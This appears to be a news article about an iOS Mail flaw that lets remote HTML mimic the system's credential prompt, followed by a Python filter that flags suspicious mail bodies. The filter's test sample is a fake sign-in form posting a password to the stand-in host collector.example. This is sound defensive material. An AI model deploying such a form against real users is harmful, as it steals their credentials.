Apple’s iOS platform is one of the most secure mobile operating systems in the world, and each release brings new security features and enhancements. iPhones and iPads are proliferating in the workplace at a rapid pace, and even spy agencies tend to have difficulties cracking encrypted communications that originate on an iOS device.
But no software is without flaws, and a new security vulnerability makes iPhones and iPads painfully vulnerable to phishing scams that can easily allow someone to steal your Apple ID username and password.
Ernst and Young security researcher Jan Soucek has built a tool that could easily trick iPhone and iPad users into handing over the usernames and passwords tied to their email accounts or even Apple IDs.
As noted by The Register, Soucek’s tool takes advantage of a potential flaw in Apple’s iOS Mail app: the app automatically loads remote HTML content. The researcher has simply created HTML pop-ups that look exactly like the dialog box that appears when an iOS device requires the user to reenter his or her email credentials or Apple ID.
Unsuspecting victims are so used to seeing these dialog boxes that the odds are good they would just enter their email addresses and passwords without thinking twice. Once this sensitive information is entered and the user taps OK, his or her credentials are sent to a remote server where hackers can access them.
As noted by the researcher, Apple has yet to address the issue.
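For mail administrators, the behavior described above (an HTML message that renders a credential prompt and sends the input to a remote server) can be screened for before delivery. The following is an added example, not code from the researcher or from Apple; the tag list, the quarantine rule and the sample messages are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags that pull a remote document into the rendered message (assumed list).
REMOTE_HTML = {"iframe": "src", "object": "data", "embed": "src"}

def remote_host(url):
    """Return the host of an http(s) or protocol-relative URL, else None."""
    url = url.strip()
    parsed = urlparse(url)
    if parsed.scheme in ("http", "https") or url.startswith("//"):
        return parsed.hostname
    return None

class MailBodyAudit(HTMLParser):
    """Collects elements that ask for a password or load remote HTML."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append(("password-input", a.get("name", "")))
        elif tag == "form" and remote_host(a.get("action", "")):
            self.findings.append(("remote-form", remote_host(a["action"])))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("remote-html", a.get("content", "")))
        elif tag in REMOTE_HTML and remote_host(a.get(REMOTE_HTML[tag], "")):
            self.findings.append(("remote-html", remote_host(a[REMOTE_HTML[tag]])))

def audit(html_body):
    parser = MailBodyAudit()
    parser.feed(html_body)
    parser.close()
    kinds = {kind for kind, _ in parser.findings}
    # Legitimate mail rarely carries a password field or swaps in a remote page.
    return {"quarantine": bool(kinds & {"password-input", "remote-html"}),
            "findings": parser.findings}

# Constructed samples, not taken from any real message.
SUSPICIOUS = """<html><body><form action="https://collector.example/submit" method="post">
<p>Sign in to iCloud</p><input type="text" name="user">
<input type="password" name="pw"><input type="submit" value="OK"></form></body></html>"""
BENIGN = '<html><body><p>Minutes attached. <a href="https://intranet.example/">Wiki</a></p></body></html>'

if __name__ == "__main__":
    for name, body in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, audit(body))
```

Ordinary links and remote images are deliberately not flagged, since they appear in most legitimate HTML mail.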